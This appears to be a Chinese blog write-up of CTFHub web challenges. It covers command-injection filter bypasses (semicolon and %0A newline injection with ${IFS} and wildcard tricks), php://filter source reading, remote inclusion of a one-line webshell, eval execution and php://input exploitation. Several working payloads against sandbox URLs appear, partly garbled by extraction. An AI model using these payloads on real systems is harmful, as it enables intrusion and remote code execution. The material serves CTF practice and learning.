ctfhub 过滤运算符 综合过滤练习 读取源代码 远程包含 eval执行 文件包含 php://input

过滤运算符

在这里插入图片描述

过滤了\和&那么尝试;
在这里插入图片描述

成功那么将flag cat出来
127.0.0.1;cat flag_27249269530391.php
在这里插入图片描述

得到flag

综合过滤练习

在这里插入图片描述

这次过滤有点多过滤了&;空格flag,cat,ctfhub
但是没有过滤%0a,%0d,用 I F S 取 代 空 格 , 用 {IFS}取代空格,用 IFS*绕过关键词过滤,因为在没有定义的情况下,$*在shell命令执行下为空
在这里插入图片描述

回显有一个flag_is_here文件夹
payload:http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd${IFS}fl*ag_is_here%0Als#这里ls是对flag_is_here目录进行操作,所有ls 是在cd flag_is_here执行后在flag_is_here目录下执行,这里拼接的就得用%0a换行符,可以等效&&,不能用%0d,%0d等效于&。
在这里插入图片描述

将flag tail出来
http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd I F S f l ∗ a g i s h e r e {IFS}fl*ag_is_here%0Atail IFSflagishere{IFS}fl*ag_126912367811026.php#
在这里插入图片描述

得到flag

读取源代码

在这里插入图片描述

进入环境源码直接给了出来分析代码尝试使用伪协议来读取
?file=php://filter/read=convert.base64-encode/resource=/flag
将读取出来的字符串进行base64解码
在这里插入图片描述

flag出现

远程包含

在这里插入图片描述

根据题意我们首先在服务器中创建一个文件夹然后编辑一个一句话木马
在这里插入图片描述

python启动一个http服务
在这里插入图片描述

然后使用蚁剑连接即可

eval执行

在这里插入图片描述

题目一进去就把源码给了出来
在这里插入图片描述

测试了一下函数能直接运行
在这里插入图片描述

将flag cat出来
在这里插入图片描述

文件包含

在这里插入图片描述

进入题目点击shell
在这里插入图片描述

源代码如上
在这里插入图片描述

根据题意文件包含又提供了shell,使用hackbar进行shell的使用

在这里插入图片描述

查看根目录发现flag
在这里插入图片描述

cat出来
在这里插入图片描述

php://input

在这里插入图片描述

进入题目题目将源码给了出来并且前六位必须为php://
根据题目得知需要使用php://input来解题
补充一个知识点
在这里插入图片描述

抓包使用php://input漏洞
在这里插入图片描述

cat flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值